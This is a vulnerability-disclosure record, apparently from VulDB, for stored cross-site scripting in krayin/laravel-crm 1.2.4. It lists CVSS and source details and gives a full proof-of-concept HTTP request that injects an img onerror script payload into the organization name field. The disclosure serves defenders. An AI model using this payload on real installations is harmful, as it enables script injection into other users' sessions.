| Field | Value |
|---|---|
| Title | Cross-site Scripting (Stored XSS) in krayin/laravel-crm v1.2.4 |
| Description | laravel-crm version 1.2.4 is vulnerable to Cross-Site Scripting (XSS) via the group name in edit and create organizations in Webkul. Source: https://github.com/krayin/laravel-crm. CVSS: `CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L`. Occurrences: https://github.com/krayin/laravel-crm/blob/master/packages/Webkul/Admin/src/Http/Controllers/Contact/OrganizationController.php#L52-L108. PoC request: see the request below the table. |
| Source | ⚠️ https://drive.google.com/file/d/1t7JwP0Qyo6ye-2dt6XhA1ENHDwsnYjD3/view?usp=sharing |
| User | huutuanbg97 (UID 45015) |
| Submission | 11.05.2023 14:56 (3 years ago) |
| Moderation | 27.05.2023 09:18 (16 days later) |
| Status | Accepted |
| VulDB entry | 230079 [Webkul krayin crm 1.2.4 Edit Person Page 2 Firma Cross Site Scripting] |
| Points | 20 |

PoC Request (as attached to the submission):

```http
POST /laravel-crm/admin/contacts/organizations/edit/2 HTTP/1.1
Host: 192.168.125.197
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------287614653021430389054091948804
Content-Length: 1113
Origin: http://192.168.125.197
Connection: close
Referer: http://192.168.125.197/laravel-crm/admin/contacts/organizations/edit/2
Cookie: XSRF-TOKEN=
Upgrade-Insecure-Requests: 1

-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="_token"

pEiJe5Rmk81ZhvOyCgZqYkaMcf1jYyOnTV5wXh49
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="_method"

PUT
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="name"

2"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[address]"

2
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[country]"

AZ
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[state]"

2
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[city]"

2
-----------------------------287614653021430389054091948804
Content-Disposition: form-data; name="address[postcode]"

2
-----------------------------287614653021430389054091948804--
```